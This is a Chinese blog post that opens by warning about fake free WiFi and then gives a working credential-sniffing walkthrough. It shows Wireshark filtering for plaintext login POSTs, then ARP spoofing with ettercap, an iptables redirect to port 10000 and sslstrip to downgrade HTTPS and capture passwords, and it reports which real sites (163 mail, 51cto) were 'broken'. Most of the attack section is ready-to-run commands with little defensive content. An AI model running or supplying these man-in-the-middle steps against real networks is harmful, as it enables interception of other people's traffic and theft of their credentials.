千家信息网

免费WiFi,wireshark抓包及sslstrip抓密码

发表于:2025-02-02 作者:千家信息网编辑
千家信息网最后更新 2025年02月02日,因写了一段文字,就有这个抓包实验--------------------------------话说:"现在我们一到某处,第一件事便是问有没有WiFi"。WiFi成为当下的热门,在公共场合人们最喜欢免
千家信息网最后更新 2025年02月02日免费WiFi,wireshark抓包及sslstrip抓密码

因写了一段文字,就有这个抓包实验

--------------------------------

话说:"现在我们一到某处,第一件事便是问有没有WiFi"。WiFi成为当下的热门,在公共场合人们最喜欢免费WiFi。但用着用着后不觉QQ被盗了。这WiFi便是诱饵,钓鱼人设了一个局,我们以为捡到便宜了,须不知,我们上勾了。QQ被盗,邮箱被浏览等等。免费虽好,请谨慎。

---------------------------------------

1.利用wireshark抓包测试51cto帐户及密码

环境的搭建

网络环境:网关:192.168.199.1;

测试主机:192.168.199.101,ubuntu13.04/wireshark;

测试目标:51cto.com

步骤

a.ubuntu 13.04安装wireshark

sudo apt-get wireshark

b. 新建wireshark组把普通用户加入其中,给wireshark使用权限

sudo groupadd wireshark //加组wireshark

sudo gpasswd -a zozlin wireshark //向组 GROUP 中添加用户 USER

sudo chgrp wireshark /usr/bin/dumpcap // 更抓包文件改组

sudo chmod 4755 /usr/bin/dumpcap //可执行权限

错误:

解决方法:sudo gedit /usr/share/wireshark/init.lua

倒数第二行原来为:dofile(DATA_DIR.."console.lua")改为--dofile(DATA_DIR.."console.lua")

c. sudo wireshark 选择网卡(在本机测试)

定过滤规则

ip.src==192.168.199.100 && http (源地址及http协议)

重点 (post application/x-www-form-urllencoded)

先试试天涯论坛和163邮件的密码,ssl己加密传输了。后51cto 发现是明文帐号密码

-----------------------------------------


2.利用sslstrip和ettercap突破ssl嗅探密码

环境的搭建

网络环境:网关:192.168.199.1;

***主机:192.168.199.101,ubuntu13.04/wireshark/sslstrip;

被***主机:192.168.199.105/103,虚拟机Windowsxp,IE6;

测试目标:51cto.com mail.163.com tianya.cn baidu.com

步骤

下载

http://www.thoughtcrime.org/software/sslstrip/


解压

tar -zxvf sslstrip-0.9.tar.gz


安装

sslstrip python setup.py install


打开ip_forword转发

echo "1">/proc/sys/net/ipv4/ip_forward


使用Iptables过滤数据包 //通过iptables 把所有http数据导入到10000端口,我们用sslstrip监听10000端口,并得到我们想要的数据

iptables -t nat -A PREROUTING -p tcp -destination-port 80 -j REDIRECT -to-port 10000

sslstrip -l 10000


利用ettercap进行arp欺骗

ettercap -T -q -M arp:remote /192.168.199.103/ /192.168.199.1/


成果

mail.163.com 51cto.com 破

baidu.com 密码再次加密了

tianya.cn 未破


参考1.http://www.freebuf.com/articles/web/5929.html

2.http://www.blogjava.net/heyang/archive/2011/04/05/340330.html

3.http://www.linuxde.net/2011/11/2522.html



0